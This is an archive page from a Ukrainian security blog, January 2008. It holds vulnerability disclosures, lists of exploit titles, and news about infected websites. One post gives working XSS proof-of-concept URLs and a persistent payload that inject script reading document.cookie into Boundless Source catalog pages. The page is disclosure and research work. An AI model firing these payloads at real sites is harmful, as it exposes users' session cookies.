Архів за Січень, 2008

Уразливості на www.opennet.ru

19:16 28.01.2008

03.09.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті www.opennet.ru (який в тому числі публікує новини безпеки). А сьогодні я знайшов ще дві XSS уразливості. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.01.2008

XSS:

Дані уразливості вже виправлені. До речі, в листопаді я писав про уразливість в капчі - opennet.ru CAPTCHA bypass.

Добірка експлоітів

16:25 28.01.2008

В даній добірці експлоіти в веб додатках:

  • Joomla Component JContentSubscription 1.5.8 Multiple RFI Vulns (деталі)
  • Joomla Component MP3 Allopass 1.0 Remote File Inclusion Vulnerability (деталі)
  • cpDynaLinks 1.02 category.php Remote SQL Injection Exploit (деталі)
  • Pindorama 0.1 client.php Remote File Inclusion Vulnerability (деталі)
  • WebDesktop 0.1 Remote File Inclusion Vulnerabilities (деталі)
  • PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability (деталі)
  • Apple iTouch/iPhone 1.1.1 tif File Remote Jailbreak Exploit (деталі)
  • KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit (деталі)
  • TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit (деталі)
  • Woltlab Burning Board 2.X usergroups.php SQL Injection exploit (деталі)

Легальні сайти - головні розповсюджувачі шкідливих програм

22:39 27.01.2008

Як відзначається в недавньому звіті компанії Websense, кількість сайтів, взломаних для розміщення шкідливого коду, у даний час істотно перевищує число ресурсів спеціально створених для поширення хробаків і інших подібних програм. Експерти Websense роблять висновок, що інфікування існуючих сайтів несе значно більшу вигоду для зловмисників, оскільки в подібних ресурсів як правило вже мається деяка аудиторія і коло постійних відвідувачів, серед яких і може бути розповсюджений шкідливий код.

Найчастіше метою зловмисників є персональні дані користувачів, банківська інформація чи реквізити для доступу до акаунтів популярних онлайнових багатокористувацьких ігор. Експерти Websense регулярно обновляють чорний список заражених сайтів і намагаються інформувати адміністрацію скомпрометованих ресурсів. Однак, потім найчастіше сайт залишається в списку заражених протягом декількох місяців через нерозторопність адміністраторів, що побоюються, що встановлення оновлень в антивірусному чи будь-якому іншому ПЗ, на базі якого працює сайт, може викликати небажані наслідки. Особливо це стосується адміністраторів корпоративних мереж.

У звіті серед самих небезпечних вірусних загроз минулого року згадується і сумнозвісний хробак Storm, що з’явився на початку минулого року. Постійно змінюючи тактику поширення шкідливої програми, зловмисники змогли інфікувати сотні тисяч комп’ютерів по всьому світі. Бот-мережа Storm, за деякими оцінками, на піку своєї могутності нараховувала до 50 мільйонів ПК, і зараз як і раніше важко сказати, наскільки велика ця мережа.

По матеріалам http://www.securitylab.ru.

MustLive Perl Pascal Programs Interpreter

19:42 27.01.2008

Позавчора вийшла нова версія програми Perl Pas Interpreter v.1.3.7. В новій версії:

  • Додана підтримка функцій в циклах while.
  • Додана підтримка вкладених циклів в циклах while. До будь-якого рівня вкладеності.
  • Покращена підтримка функцій в операторі if та циклі for.
  • Виправлені дебаг надписи в операторі присвоєння.
  • Покращена робота функцій chr та ord з масивами (з індексом-змінною).

Деталі на сайті інтерпретатора. Тема для обговорення програми на форумі.

Додаткова інформація про Perl Pas Interpreter в розділі Онлайн інструменти.

Добірка уразливостей

16:33 27.01.2008

В даній добірці уразливості в веб додатках:

  • SQL injection vulnerability in webSPELL 4.01.02 (деталі)
  • Directory traversal flaw in shttp (деталі)
  • AdMentor Script Remote SQL injection Exploit (деталі)
  • phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities (деталі)
  • SQL injection vulnerability in Francisco Burzi PHP-Nuke 8.0 (деталі)
  • Vulnerability in phpMyFAQ (деталі)
  • Cross-site scripting vulnerability in the Barry Jaspan Image Pager module for Drupal (деталі)
  • Vulnerability in newsCMSlite (деталі)
  • SQL injection vulnerability in E-SMARTCART 1.0 (деталі)
  • Розкриття ідентифікаторів сесій користувачів в Drupal Chatroom (деталі)
  • Переповнення буфера в ProFTPD (деталі)
  • SQL injection vulnerability in Simple Web Content Management System (деталі)
  • Уразливість при обробці команди LIST в Crob FTP Server (деталі)
  • Vulnerability in Sven Moderow GuestBook 0.3a (деталі)
  • Обхід механізму захисту від XSS в Adobe ColdFusion MX (деталі)

Cross-Site Scripting уразливості в Boundless Source

23:52 26.01.2008

У листопаді, 29.11.2007, я знайшов Cross-Site Scripting уразливості у веб додатку Boundless Source (скрипт каталогу).

XSS:

http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20

http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

POST запит на сторінці http://site/catalog/add-lnk.cgi?cmd=showform

<BODY onload=alert(document.cookie)В полях: Название ресурса, URL, Регион, Описание сайта.

Вразливі версії Boundless Source 1.2.1 (безкоштовна) і 2.4 (комерційна) та попередні версії. Про уразливості розробникам веб додатка я повідомлю найближчим часом.

Sophos: Щодня інфікується 6000 веб-сторінок

22:36 26.01.2008

Число заражених веб-сторінок росте з загрозливою швидкістю. За даними дослідників безпеки, число комп’ютерів-ботів також стрімко росте.

Дослідники ІБ з Sophos щодня виявляють близько 6000 нових інфікованих веб-сторінок, тобто одну сторінку кожні 14 секунд. Чотири з п’яти (83 %) цих сторінок належать ні в чому не винним компаніям і приватним особам, що і не підозрюють, що їх сайти взломані й заражені. Розробники вірусів не щадять нікого: ні дилерів антикваріату, ні виробників морозива, ні весільних фотографів.

Це дослідження проливає світло на серйозну проблему ІБ: поширення вірусів здійснюється за допомогою заражених веб-сторінок і спама. Кіберзлочинці розсилають користувачам спам-листи, що містять лінки на заражені веб-сторінки. Щонайменше, одна з десяти веб-сторінок заражена шкідливим ПЗ, відповідно до дослідження Google, опублікованому в травні 2007 р. Найчастіше ці шкідливі програми спрямовані на те, щоб скомпрометувати користувацьку систему і “зомбувати” її для включення в ботнет.

Щодня біля півмільйона комп’ютерів стають ботами, згідно даним PandaLabs, підрозділу антивірусної компанії Panda Software. Приблизно 11% комп’ютерів в усьому світі стали частиною ботнетів, що відповідальні за 85% усіх спам-повідомлень.

По матеріалам http://www.securitylab.ru.

Уразливість на web.meta.ua

20:27 26.01.2008

27.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://web.meta.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів компанії Мета я писав про уразливості на bg.meta.ua.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.01.2008

XSS:

Дана уразливість вже виправлена.

Добірка експлоітів

15:42 26.01.2008

В даній добірці експлоіти в веб додатках:

  • Joomla Component wmtportfolio 1.0 Remote File Inclusion Vulnerability (деталі)
  • Joomla Flash Image Gallery Component RFI Vulnerability (деталі)
  • Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability (деталі)
  • LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability (деталі)
  • xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability (деталі)
  • Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector (деталі)
  • TikiWiki 1.9.8 Remote PHP Injection Vulnerability (деталі)
  • Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit (деталі)
  • NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability (деталі)
  • Orion-Blog v2.0 Version Remote Privilege Escalation Exploit (деталі)

Уразливості в плагінах для WordPress №5

23:50 25.01.2008

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wp-FileManager, WP-Forum та Permalinks Migration. Для котрих нещодавно з’явилися експлоіти. Wp-FileManager - це плагін файлового менеджера, WP-Forum - це плагін для створення форума, а Permalinks Migration - це плагін для переходу на використання пермалінків.

  • Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability (деталі)
  • Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability (деталі)
  • XSRF under Dean’s Permalinks Migration 1.0 (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.